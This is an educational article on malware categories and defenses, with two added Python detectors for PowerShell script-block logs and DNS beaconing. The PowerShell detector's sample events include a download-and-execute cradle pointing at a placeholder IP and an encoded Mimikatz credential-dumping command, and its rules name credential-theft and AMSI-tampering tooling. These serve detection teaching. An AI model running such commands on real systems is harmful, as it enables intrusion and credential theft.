Malware Types Explained: From Viruses to Ransomware
A comprehensive overview of malware categories, how each type works, and the defenses most effective against them.
Malware (malicious software) is any software intentionally designed to cause damage, gain unauthorized access, or disrupt operations. It is the broadest category of cyber threat and encompasses everything from simple nuisance programs to sophisticated nation-state tools.
Understanding malware types helps you recognize attack patterns, choose appropriate defenses, and communicate effectively during incident response.
A virus inserts its own code into a legitimate program or file and runs whenever that host is executed or opened. Viruses cannot spread on their own: they rely on a person copying and running the infected host, for example by opening an infected email attachment or running a compromised installer. Once running, they can corrupt files, steal data, or create backdoors.
Classic file-infecting viruses are far less common than they were in the 1990s and 2000s, but the concept persists in macro viruses embedded in Office documents. Because of this, Microsoft now blocks macros by default in Office files downloaded from the internet, so attackers typically have to talk the user into removing that protection first.
Worms are self-replicating malware that spread across networks without human interaction, exploiting vulnerabilities in exposed network services to copy themselves from host to host. The Morris Worm (1988) and WannaCry (2017) are famous examples. WannaCry used the EternalBlue exploit for an SMBv1 vulnerability (patched in MS17-010 two months earlier) to spread across networks in minutes, dropping its ransomware payload on every host it reached.
Defense: patch management, network segmentation, and disabling unnecessary network services; hosts that had applied MS17-010 or had SMBv1 disabled were immune to WannaCry's spread.
Trojans disguise themselves as legitimate software. Users voluntarily install them, believing they are downloading a useful application, game crack, or document viewer. Once installed, the Trojan executes its payload, which might install a backdoor, steal credentials, or download additional malware.
Remote Access Trojans (RATs) give attackers persistent, remote control over the infected system. They can access the webcam, capture keystrokes, browse files, and use the machine as a pivot point.
Defense: user awareness, application allowlisting, and download source verification.
Ransomware encrypts a victim's files and demands payment (typically in cryptocurrency) for the decryption key. Modern ransomware operations use double extortion: they steal data before encrypting it and threaten to publish it if the ransom is not paid. Some groups add triple extortion, contacting the victim's customers or partners to apply additional pressure.
Ransomware-as-a-Service (RaaS) models allow affiliates to deploy ransomware developed by the group's operators, splitting the proceeds. This has dramatically lowered the barrier to entry for ransomware attacks.
Defense: robust backups (restore-tested regularly, with at least one copy offline or immutable so the ransomware cannot encrypt or delete it), EDR, network segmentation, privilege management, and incident response planning.
Spyware silently monitors user activity and exfiltrates data. It may capture keystrokes (keylogger), take screenshots, monitor browsing history, or intercept communications. Commercial spyware (like NSO Group's Pegasus) targets mobile devices and can access messages, calls, cameras, and microphones.
Defense: EDR, mobile device management, application permissions review.
Adware displays unwanted advertisements, often as browser pop-ups or redirects. While less dangerous than other malware types, aggressive adware can degrade system performance, track browsing habits, and sometimes serve as a delivery mechanism for more serious malware.
Rootkits embed themselves deep in the operating system (kernel level or below) to hide their presence and the presence of other malware. They modify system calls, file listings, and process tables so that security tools cannot detect the malicious software running on the system.
Firmware rootkits persist below the OS, in UEFI or other device firmware, so they survive OS reinstallation and even hard drive replacement. They are extremely difficult to detect and remove.
Defense: Secure Boot, measured boot with TPM-based attestation, UEFI integrity monitoring, and in severe cases, hardware replacement.
Fileless malware avoids writing its payload to disk as an executable. It leverages legitimate system tools (PowerShell, WMI, .NET) to execute malicious actions in memory, a technique called "living off the land." Because there is no malware file on disk, traditional antivirus tools that scan files are ineffective. "Fileless" is rarely absolute, though: many such attacks still persist through a registry run key, a scheduled task, or a WMI event subscription that relaunches the in-memory payload after a reboot.
Defense: behavioral detection (EDR), PowerShell module logging and script block logging (which records the code PowerShell actually executes, even when it was supplied obfuscated or as an encoded command), and restricting access to administrative tools.
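The following is an added example, not code from the original article, showing what "script block logging" buys a defender: a small triage pass over PowerShell Event ID 4104 records that looks for download cradles, hidden windows, credential-dumping tooling, and encoded commands, and decodes the encoded payload so it can be scanned too. The event records are constructed to resemble the ScriptBlockText field of that event; the dictionary field names, the rule set, and the thresholds are assumptions for illustration rather than any vendor's ruleset.

```python
"""Triage PowerShell script block log events for living-off-the-land tradecraft.

Added example, not code from the original article. The events below are
constructed to resemble the ScriptBlockText field of Event ID 4104
(Microsoft-Windows-PowerShell/Operational); dictionary field names and the
rule set are assumptions for illustration, not a vendor ruleset.
"""
import base64
import re

# Patterns that are rare in administrative scripts but common in droppers.
RULES = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "credential_dumping": re.compile(r"Invoke-Mimikatz|sekurlsa|lsass", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "wmi_persistence": re.compile(
        r"__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding", re.I),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
# and expects base64 of UTF-16LE text. Heuristic: a real parser would tokenize the line.
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def _encoded(command):
    """Encode a command the way an attacker would for -EncodedCommand (used to build samples)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample events (not real telemetry). 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "ws01",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"EventID": 4104, "Computer": "ws02",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"EventID": 4104, "Computer": "ws03",
     "ScriptBlockText": "powershell -nop -w hidden -enc " + _encoded("Invoke-Mimikatz -DumpCreds")},
    {"EventID": 4104, "Computer": "ws04",
     "ScriptBlockText": "Get-WmiObject Win32_Service | Where-Object {$_.State -eq 'Running'}"},
]


def decode_encoded_command(text):
    """Return the decoded payload of an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # not valid base64 or not UTF-16LE: treat as no encoded command
        return None


def score_script_block(text):
    """Return the names of every rule the script block (and any encoded payload) trips."""
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        # Encoding exists to hide strings from exactly this kind of check, so rescan the payload.
        hits.extend(h for h in score_script_block(decoded) if h not in hits)
    return hits


def triage(events):
    """Return one alert per 4104 event that trips at least one rule."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev["ScriptBlockText"]
        rules = score_script_block(text)
        if rules:
            alerts.append({"Computer": ev["Computer"], "rules": rules,
                           "decoded": decode_encoded_command(text)})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Running it flags ws02 (download cradle piped into Invoke-Expression) and ws03 (hidden window plus an encoded command that, once decoded, names a credential-dumping tool), while the two administrative one-liners pass. The rescan of the decoded payload is the important step: without script block logging and decoding, the only thing on disk or in a process-creation log is an opaque base64 blob.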
A botnet is a network of compromised devices controlled by an attacker (the botmaster). Individual infected devices are called bots or zombies. Botnets are used for DDoS attacks, spam distribution, credential stuffing, cryptocurrency mining, and as proxy networks for anonymizing other attacks.
Defense: network monitoring for command-and-control traffic (periodic "beaconing" to the same destination on a fixed sleep interval is a common tell), DNS filtering, and IoT security practices such as changing default credentials and keeping device firmware updated.
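As an added example, not part of the original article, here is what "network monitoring for command-and-control communication" can look like in practice over a DNS query log: one check flags (client, name) pairs whose query timing is suspiciously regular, the signature of an implant calling home on a fixed sleep with a little jitter, and a second flags names whose labels look machine-generated (high character entropy, digits mixed in, few vowels), which is how domain-generation algorithms produce rendezvous names. The log lines are constructed (timestamp, client IP, queried name); the layout and the thresholds are assumptions chosen to illustrate the checks, not tuned values from any product.

```python
"""Beaconing and DGA heuristics over a DNS query log.

Added example, not from the original article. Log lines are constructed as
"<unix_ts> <client_ip> <queried_name>"; the layout and all thresholds are
assumptions chosen to illustrate the two checks.
"""
import math
import statistics
from collections import Counter, defaultdict

# Constructed sample log. 10.0.0.15 queries one name every ~300 s (with jitter) and
# once resolves a random-looking name; 10.0.0.22 browses at irregular, bursty times.
SAMPLE_DNS_LOG = """\
1700000000 10.0.0.15 sync.cdn-update.example
1700000045 10.0.0.22 www.example.com
1700000050 10.0.0.22 www.example.com
1700000298 10.0.0.15 sync.cdn-update.example
1700000602 10.0.0.15 sync.cdn-update.example
1700000700 10.0.0.15 q7x2kzp9vl3m.top
1700000899 10.0.0.15 sync.cdn-update.example
1700000900 10.0.0.22 www.example.com
1700001201 10.0.0.15 sync.cdn-update.example
1700001400 10.0.0.22 www.example.com
1700001402 10.0.0.22 www.example.com
1700001503 10.0.0.15 sync.cdn-update.example
1700001797 10.0.0.15 sync.cdn-update.example
1700002102 10.0.0.15 sync.cdn-update.example
1700003000 10.0.0.22 www.example.com
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, client, name) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, name = line.split()
        records.append((int(ts), src, name.lower().rstrip(".")))
    return records


def find_beacons(records, min_events=6, max_cv=0.1):
    """Return (client, name) pairs whose inter-query gaps are nearly constant.

    Human-driven traffic is bursty, so the coefficient of variation (stdev / mean)
    of the gaps is large; a sleep-and-callback loop keeps it small even with jitter.
    """
    by_pair = defaultdict(list)
    for ts, src, name in records:
        by_pair[(src, name)].append(ts)
    hits = []
    for (src, name), stamps in by_pair.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            hits.append({"src": src, "domain": name, "period": mean,
                         "cv": cv, "count": len(stamps)})
    return hits


def shannon_entropy(s):
    """Bits of entropy per character of s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_dga_like(name, min_len=8, min_entropy=3.4):
    """Heuristic: a long label with high entropy and either digits or almost no vowels."""
    labels = name.split(".")[:-1]  # drop the TLD; a real check would use the public suffix list
    for label in labels:
        if len(label) < min_len:
            continue
        digits = sum(ch.isdigit() for ch in label)
        vowels = sum(ch in "aeiou" for ch in label)
        if shannon_entropy(label) >= min_entropy and (digits >= 2 or vowels / len(label) < 0.15):
            return True
    return False


def find_dga_candidates(records):
    """Unique queried names that look machine-generated."""
    return sorted({name for _, _, name in records if is_dga_like(name)})


if __name__ == "__main__":
    recs = parse_log(SAMPLE_DNS_LOG)
    for hit in find_beacons(recs):
        print("beacon:", hit)
    print("dga-like:", find_dga_candidates(recs))
```

On the sample, 10.0.0.15's queries to sync.cdn-update.example come out with a period of about 300 s and a coefficient of variation near 0.01, so they are reported as a beacon, while 10.0.0.22's bursty browsing to www.example.com has just as many events but is not. The DGA check reports only q7x2kzp9vl3m.top. Both heuristics produce false positives on their own (software update checks also beacon, and CDN hostnames can look random), which is why in practice they are used to rank destinations for analyst review or to feed a DNS filtering policy rather than to block outright.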
Written by CDA Wiki Team